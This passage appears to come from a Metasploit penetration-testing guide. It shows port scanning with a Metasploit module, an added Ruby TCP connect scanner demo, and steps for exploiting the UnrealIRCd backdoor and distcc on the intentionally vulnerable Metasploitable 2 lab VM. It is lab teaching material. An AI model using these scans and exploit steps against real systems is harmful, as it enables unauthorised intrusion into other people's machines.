Set the remote address range: set RHOSTS 192.168.217.131 (RHOSTS accepts ranges and CIDR notation, so one run can cover a whole subnet). Change the ports to scan: set PORTS 1-1000.
Then type run to run the module. The open ports found are also stored in the database (see the services command).
There are many more scanner modules that make routine tasks simple; try the others according to your need.
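To show what the TCP port scanner module (and nmap -sT in the information gathering chapter) actually does, here is an added Ruby example that is not part of the guide and not Metasploit code: a threaded TCP connect scanner with a parser for the PORTS option syntax. The demo target is a listener the script opens on a random loopback port, so it runs offline; the host, ports and thread count are constructed for the demo.

```ruby
# Added example (not from the guide or from Metasploit): a TCP connect scanner
# doing what auxiliary/scanner/portscan/tcp and nmap -sT do: complete a TCP
# handshake to each port and report the ones that accept. Because the handshake
# completes, every probe shows up in the target's service logs.
require 'socket'
require 'timeout'

# Parse a PORTS option the way msfconsole does: "22,80,1-1000" -> [22, 80, 1..1000]
def parse_ports(spec)
  spec.split(',').flat_map do |part|
    a, b = part.strip.split('-').map(&:to_i)
    b ? (a..b).to_a : [a]
  end.uniq.sort
end

# One probe: open = handshake completes; closed = RST (ECONNREFUSED);
# filtered = no answer at all, which we report as closed after the timeout.
def port_open?(host, port, timeout = 0.5)
  Timeout.timeout(timeout) do
    TCPSocket.new(host, port).close
    true
  end
rescue Errno::ECONNREFUSED, Errno::EHOSTUNREACH, Errno::ETIMEDOUT, Timeout::Error
  false
end

# Scan with a small worker pool (like the module's THREADS option); returns the
# sorted list of open ports.
def scan(host, ports, threads: 10)
  queue = Queue.new
  ports.each { |p| queue << p }
  found = Queue.new
  workers = Array.new(threads) do
    Thread.new do
      loop do
        port = begin
          queue.pop(true)          # non-blocking; raises ThreadError when empty
        rescue ThreadError
          break
        end
        found << port if port_open?(host, port)
      end
    end
  end
  workers.each(&:join)
  Array.new(found.size) { found.pop }.sort
end

if $PROGRAM_NAME == __FILE__
  # Constructed target: a listener on a random loopback port plays the "service".
  service = TCPServer.new('127.0.0.1', 0)
  port = service.addr[1]
  puts "open ports: #{scan('127.0.0.1', parse_ports("#{port - 1}-#{port + 1}")).inspect}"
  service.close
end
```

Against a real target, replace the loopback address with RHOSTS and the range with PORTS; a closed port answers immediately with a RST, while a firewalled port costs the full timeout, which is why scanning 1-65535 with a short timeout and many threads matters.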
Chapter Twelve
Linux exploitation
So far you have seen Windows exploitation; now I will show you how to exploit a Linux operating system. In this chapter we use Metasploitable 2, an intentionally vulnerable Ubuntu-based system built by the Metasploit developers so that security professionals can practise with their tools. It also hosts the vulnerable web applications Mutillidae and DVWA (Damn Vulnerable Web Application), which contain all the OWASP Top 10 vulnerabilities and more. You can download Metasploitable 2 from the link below.
https://sourceforge.net/projects/metasploitable/files/Metasploitable2/
After downloading, import it into VMware. Once the system boots, log in with username msfadmin and password msfadmin. First we have to know its IP address: type ifconfig. Then, from your BackTrack machine, use nmap to scan the open ports and services on the Metasploitable 2 machine.
Scanning with nmap: Usage: nmap -sT -v 192.168.217.136 (the Metasploitable IP address).
You can see many services running. I will choose the UnrealIRCd exploit: the IRC daemon on port 6667 is version 3.2.8.1, whose source archive was trojaned with a backdoor that executes any command sent with the "AB" prefix. Now search for this exploit.
You can see only one exploit is available (exploit/unix/irc/unreal_ircd_3281_backdoor) and its rank is excellent, meaning it is reliable and will not crash the service.
Exploit 2: distcc_exec. distcc distributes compilation jobs across machines on a network; Metasploitable's distcc daemon accepts jobs from anyone without authentication, which lets us run arbitrary commands. You can learn more about this exploit at the link below.
http://metasploit.com/modules/exploit/unix/misc/distcc_exec
Step 1: use exploit/unix/misc/distcc_exec
Conclusion: That's all I have for this document. I would warmly welcome your feedback, positive or negative; your suggestions would help me improve it. Thank you very much for reading. Practise all the commands to gain confidence and command over Metasploit. Please do not violate any security rules and do not do anything malicious with these techniques (I hope you really wouldn't). All the techniques mentioned here were executed on my own laptop in a lab. If you have any queries or concerns, please feel free to contact me (my contact details are below). Finally, I would like to conclude with an excellent quote: "There is no security in life, only opportunity." - Mark Twain
About me: I, Kaleem Shaik, am working as an ASE (Assistant Systems Engineer) in TCS. My areas of interest are ethical hacking, penetration testing and anything and everything related to security.
Contact Details: Name: Kaleem Shaik Email: kaleemshaik786@hotmail.com